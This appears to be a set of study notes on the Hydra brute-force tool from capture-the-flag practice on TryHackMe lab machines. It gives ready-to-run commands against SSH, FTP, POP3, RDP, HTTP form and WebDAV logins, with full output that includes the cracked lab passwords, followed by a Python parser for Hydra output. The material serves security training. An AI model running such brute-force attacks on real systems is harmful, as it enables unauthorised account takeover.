
Hydra: Notes

Hydra: Pentesting Hacking Tool - Brute Force password attack

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra)

Hydra source code: https://gitlab.com/kalilinux/packages/hydra

Example of ftp login

hydra -l chris -P /usr/share/wordlists/common.txt ftp://10.10.242.129

Example of ssh login

hydra -l jessie -P /usr/share/wordlists/rockyou.txt 10.10.65.195 ssh

Yet another example of ssh login

target=10.10.33.252
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://$target

Yet another example of ssh login

# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.68.186 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-23 20:38:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking ssh://10.10.68.186:22/
[22][ssh] host: 10.10.68.186   login: molly   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-23 20:38:49
# hydra -l noraj -P /usr/share/wordlists/rockyou-12.txt 10.10.93.131 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-13 09:18:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 555079 login tries (l:1/p:555079), ~34693 tries per task
[DATA] attacking ssh://10.10.93.131:22/
[22][ssh] host: 10.10.93.131   login: noraj   password: cheeseburger
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-13 09:19:08
#

Yet another example of ssh login on a non-standard port (80 instead of 22, selected with -s)

root@X220:/mnt/d/OneDrive/tryhackme/jackofalltrades# hydra -l jack -P jacks_password_list ssh://10.10.148.230 -s 80
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 18:30:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.148.230:80/
[80][ssh] host: 10.10.148.230   login: jack   password: REDACTED-PASSWORD
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-14 18:30:07
root@X220:/mnt/d/OneDrive/tryhackme/jackofalltrades#

Example of http-post-form login form (the module argument is three colon-separated parts: the path, the POST body with ^USER^/^PASS^ placeholders, and the string that marks a failed login)

# hydra -l frank -P /usr/share/wordlists/rockyou.txt devguru.local http-post-form "/user/login:_csrf=dKGSvb5OKXIuMHfMk8UAzVUixME6MTYwNzI2NzQ4MDA1NTQxODg1Ng&user_name=frank&password=^PASS^&loginsubmit=Sign In:Username or password is incorrect." -s 8585
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-07 11:06:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://devguru.local:8585/user/login:_csrf=dKGSvb5OKXIuMHfMk8UAzVUixME6MTYwNzI2NzQ4MDA1NTQxODg1Ng&user_name=frank&password=^PASS^&loginsubmit=Sign In:Username or password is incorrect.
[STATUS] 259.00 tries/min, 259 tries in 00:01h, 14344140 to do in 923:03h, 16 active
[STATUS] 142.67 tries/min, 428 tries in 00:03h, 14343971 to do in 1675:42h, 16 active
[STATUS] 160.00 tries/min, 1120 tries in 00:07h, 14343279 to do in 1494:06h, 16 active
[STATUS] 129.53 tries/min, 1943 tries in 00:15h, 14342456 to do in 1845:25h, 16 active
[STATUS] 119.97 tries/min, 3719 tries in 00:31h, 14340680 to do in 1992:18h, 16 active
[8585][http-post-form] host: devguru.local   login: frank
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-07 11:46:38
root@T420:/mnt/f/OneDrive/tryhackme/devguru#

Yet another example of http-post-form login form

# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.68.186 http-post-form "/login:username=molly&password=^PASS^&loginsubmit=Login:Your username or password is incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-23 20:33:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-post-form://10.10.68.186:80/login:username=molly&password=^PASS^&loginsubmit=Login:Your username or password is incorrect.
[80][http-post-form] host: 10.10.68.186   login: molly   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-23 20:33:28
#

Brute force login form Jenkins

root@X220:~ # hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -s 8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-11 08:58:47
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://localhost:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[8080][http-post-form] host: localhost   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-11 08:59:38
root@X220:~ #
# ip="deliver.undiscovered.thm"
# hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/cms/index.php:username=admin&userpw=^PASS^&submit=log in:User unknown or password wrong"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-16 19:57:13
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://deliver.undiscovered.thm:80/cms/index.php:username=admin&userpw=^PASS^&submit=log in:User unknown or password wrong
[80][http-post-form] host: deliver.undiscovered.thm   login: admin   password: liverpool
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-16 19:57:38
#

Example of brute force WebDAV

hydra -l wampp -P /usr/share/wordlists/rockyou.txt 10.10.178.82 http-get /webdav

Yet another example of brute force WebDAV

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.25.128 http-get /inferno

Yet another example using http-head (Hydra itself warns that http-head auth does not work with every server and that http-get is the better choice)

# hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.234.170 http-head
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-13 15:29:12
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] http-head auth does not work with every server, better use http-get
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-head://10.10.234.170:80/
[STATUS] 1440.00 tries/min, 1440 tries in 00:01h, 14342964 to do in 166:01h, 16 active
[STATUS] 1443.33 tries/min, 4330 tries in 00:03h, 14340074 to do in 165:36h, 16 active
[STATUS] 1421.00 tries/min, 9947 tries in 00:07h, 14334457 to do in 168:08h, 16 active
[80][http-head] host: 10.10.234.170   login: rascal   password: kaylah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-13 15:37:42
#

WebDAV on port 8080

root@T420:~# ip=10.10.66.235
root@T420:~# hydra -l joker -P /usr/share/wordlists/rockyou.txt $ip http-get -s 8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-16 12:19:49
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-get://10.10.66.235:8080/
[8080][http-get] host: 10.10.66.235   login: joker   password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-16 12:20:29
root@T420:~#

Example of brute force ftp

root@X220:~# hydra -l jenny -P /usr/share/wordlists/rockyou.txt 10.10.230.70 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 18:18:10
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.230.70:21/
[21][ftp] host: 10.10.230.70   login: jenny   password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 18:18:55
root@X220:~#

Example of brute force POP3

# hydra -l boris -P /usr/share/set/src/fasttrack/wordlist.txt pop3://10.10.192.132 -s 55007
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 20:23:17
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.10.192.132:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 10.10.192.132   login: boris   password: secret1!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 20:26:15
#

Yet another example of brute force POP3

# hydra -l natalya -P /usr/share/set/src/fasttrack/wordlist.txt 10.10.192.132 -s 55007 pop3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 20:44:48
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.10.192.132:55007/
[STATUS] 53.00 tries/min, 53 tries in 00:01h, 169 to do in 00:04h, 16 active
[55007][pop3] host: 10.10.192.132   login: natalya   password: bird
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 20:47:27
#

Example of brute force RDP

root@T420:~# hydra -t 1 -V -f -l jareth -P /usr/share/wordlists/rockyou.txt rdp://10.10.95.189
....
[3389][rdp] account on 10.10.95.189 might be valid but account not active for remote desktop: login: jareth password: sarah, continuing attacking the account.
....
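All the runs above print the same handful of line shapes: the [DATA] lines with task and try counts, the target line, [WARNING]/[ERROR] lines, the [port][service] host/login/password hit lines, the RDP "might be valid" variant, and the "N of M targets ... valid password found" summary. The Python below, an added example that is not Hydra's own code and not part of the original notes, parses that output into a structured report so a run can be written up or audited (for instance to see that a hit line came without a password field, or that a target never connected). The hosts, logins and passwords in the sample are constructed; the line formats follow the real tool's output as shown on this page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample output in the shapes Hydra 9.1 prints. Hosts, logins and
# passwords are made up; the line formats match the tool's real output.
SAMPLE_OUTPUT = """\
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-13 09:18:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 555079 login tries (l:1/p:555079), ~34693 tries per task
[DATA] attacking ssh://192.0.2.10:22/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[22][ssh] host: 192.0.2.10   login: alice   password: CONSTRUCTED-PASS
[8585][http-post-form] host: app.example   login: bob
[3389][rdp] account on 192.0.2.11 might be valid but account not active for remote desktop: login: carol password: CONSTRUCTED-PASS2, continuing attacking the account.
1 of 1 target successfully completed, 1 valid password found
[ERROR] 4 targets did not resolve or could not be connected
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-13 09:19:08
"""

# Confirmed hit: "[port][service] host: H   login: L   password: P" (password may be absent).
HIT_RE = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>[\w-]+)\] host: (?P<host>\S+)\s+login: (?P<login>\S+)"
    r"(?:\s+password: (?P<password>.*))?$"
)
# RDP variant: credentials accepted but the account is not allowed to log in remotely.
POSSIBLE_RE = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>[\w-]+)\] account on (?P<host>\S+) might be valid"
    r".*?: login: (?P<login>\S+) password: (?P<password>.*?), continuing attacking the account\.$"
)
DATA_TASKS_RE = re.compile(
    r"^\[DATA\] max (?P<per_server>\d+) tasks per (?P<servers>\d+) server, overall (?P<tasks>\d+) tasks, "
    r"(?P<tries>\d+) login tries \(l:(?P<logins>\d+)/p:(?P<passwords>\d+)\)"
)
DATA_TARGET_RE = re.compile(r"^\[DATA\] attacking (?P<target>\S+)")
SUMMARY_RE = re.compile(
    r"^(?P<done>\d+) of (?P<total>\d+) targets? successfully completed, (?P<valid>\d+) valid passwords? found$"
)
TIME_RE = re.compile(r"^Hydra \(\S+\) (?P<which>starting|finished) at (?P<when>.+)$")


@dataclass(frozen=True)
class Hit:
    port: int
    service: str
    host: str
    login: str
    password: Optional[str]  # None when Hydra printed no "password:" field
    confirmed: bool = True   # False for the "might be valid" RDP lines


@dataclass
class HydraReport:
    targets: List[str] = field(default_factory=list)
    hits: List[Hit] = field(default_factory=list)
    warnings: List[str] = field(default_factory=list)
    errors: List[str] = field(default_factory=list)
    tasks: Optional[int] = None
    login_tries: Optional[int] = None
    logins: Optional[int] = None
    passwords: Optional[int] = None
    valid_found: Optional[int] = None
    started: Optional[str] = None
    finished: Optional[str] = None


def parse_hydra_output(text: str) -> HydraReport:
    """Turn one Hydra run's stdout into a HydraReport; unknown lines are ignored."""
    report = HydraReport()
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        if line.startswith("[WARNING] "):
            report.warnings.append(line[len("[WARNING] "):])
        elif line.startswith("[ERROR] "):
            report.errors.append(line[len("[ERROR] "):])
        elif (m := DATA_TASKS_RE.match(line)):
            report.tasks = int(m["tasks"])
            report.login_tries = int(m["tries"])
            report.logins = int(m["logins"])
            report.passwords = int(m["passwords"])
        elif (m := DATA_TARGET_RE.match(line)):
            report.targets.append(m["target"])
        elif (m := POSSIBLE_RE.match(line)):
            report.hits.append(Hit(int(m["port"]), m["service"], m["host"],
                                   m["login"], m["password"], confirmed=False))
        elif (m := HIT_RE.match(line)):
            report.hits.append(Hit(int(m["port"]), m["service"], m["host"],
                                   m["login"], m["password"]))
        elif (m := SUMMARY_RE.match(line)):
            report.valid_found = int(m["valid"])
        elif (m := TIME_RE.match(line)):
            if m["which"] == "starting":
                report.started = m["when"]
            else:
                report.finished = m["when"]
    return report


def confirmed_hits(report: HydraReport) -> List[Hit]:
    """Only the hits Hydra reported as working logins, not the 'might be valid' ones."""
    return [h for h in report.hits if h.confirmed]


if __name__ == "__main__":
    r = parse_hydra_output(SAMPLE_OUTPUT)
    print(f"{len(confirmed_hits(r))} confirmed hit(s) over {r.login_tries} tries against {r.targets}")
    for h in r.hits:
        print(h)
```

Run it as a script to see the parsed sample, or pipe a saved run through `parse_hydra_output`. Keeping the password optional in `Hit` matters because, as the devguru run above shows, a hit line can arrive without the password field, and a parser that assumes the field is always present silently drops that finding.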

Practice

>>> THM | Library

>>> THM | Jack of All Trades

>>> THM | Advent of Cyber 1 [2019] - Day 17

>>> THM | GoldenEye

>>> THM | Internal

>>> THM | Year of the Owl

>>> THM | HA Joker CTF
